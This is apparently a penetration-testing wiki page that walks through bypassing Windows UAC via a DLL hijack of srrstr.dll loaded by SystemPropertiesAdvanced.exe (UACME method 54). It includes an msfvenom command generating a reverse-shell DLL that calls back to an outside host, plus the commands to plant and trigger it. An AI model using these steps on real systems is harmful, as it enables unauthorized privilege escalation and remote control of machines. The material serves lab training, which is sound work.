# Bypassing UAC {% hint style="info" %} Read more about UAC on the dedicated section in Windows Security. {% endhint %} There is no command-line version of the UAC GUI consent prompt, so if we need to bypass the UAC in a CLI environment we will have to proceed as follow: ## 0 - Situation We have shell access to a windows target but are restricted by UAC which we must bypass. ## 1 - Check UAC status & level Confirm UAC is enabled: ``` C:\hacker> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA REG_DWORD 0x1 ``` `0x1` for enabled and `0x0` for disabled. Check UAC level: ``` C:\htb> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System ConsentPromptBehaviorAdmin REG_DWORD 0x5 ``` From level 1 (`0x1`) to level 5 (`0x5`) ## 2- Check Windows Build UAC bypasses leverage flaws or unintended functionality in different Windows builds. ``` PS C:\hacker> [environment]::OSVersion.Version Major Minor Build Revision ----- ----- ----- -------- 10 0 14393 0 ``` Build version 14393, which on [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page corresponds to Windows release `1607`. ## 3 - Find exploit on UACME The [UACME](https://github.com/hfiref0x/UACME) project maintains a list of UAC bypasses. We can find older ones (fixed by Windows) here => We will use method 54 for this example: ``` 54. Author: egre55 Type: Dll Hijack Method: Dll path search abuse Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll Implementation: ucmEgre55Method Works from: Windows 10 (14393) Fixed in: Windows 10 19H1 (18362) How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call ``` {% hint style="info" %} This technique targets the 32-bit version of the auto-elevating binary `SystemPropertiesAdvanced.exe`. There are many trusted binaries that Windows will allow to auto-elevate without the need for a UAC consent prompt. According to [this](https://egre55.github.io/system-properties-uac-bypass) blog post, the 32-bit version of `SystemPropertiesAdvanced.exe` attempts to load the non-existent DLL srrstr.dll, which is used by System Restore functionality. {% endhint %} ## 4 - Review the PATH As mentionned in the blog post, `SystemPropertiesAdvanced.exe` will attempt to load a non-existing DLL called `srrstr.dll` from `C:\Users\\AppData\Local\Microsoft\WindowsApps\` Non-privilege users can write to this directory because it's used to install Microsoft apps. If this dir is in our path (which it should) we can hijack the DLL (check section on DLIB if needed) ``` PS C:\hacker> cmd /c echo %PATH% C:\Windows\system32; C:\Windows; C:\Windows\System32\Wbem; C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Users\hacker\AppData\Local\Microsoft\WindowsApps; ``` ## 5 - Generating malicious DLL Using msfvenom we will spawn a reverse shell. ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f dll > srrstr.dll ``` And transfer it to the target. ## 6 - Verify the DLL If we execute the DLL itself, we should catch a shell, still restricted by UAC. ``` rundll32 shell32.dll,Control_RunDLL C:\Users\hacker\AppData\Local\Microsoft\WindowsApps\srrstr.dll ``` ## 7 - Getting unrestricted shell We can now execute SystemPropertiesAdvanced.exe which will load the dll which should send us an unrestricted shell this time (sinc SystemPropertiesAdvanced.exe can auto-elevate): ``` C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe ``` We should catch a shell, of course still under Sarah but without UAC which we can confirm: ``` whoami /priv ``` We have significantly more privileges than with a restricted shell.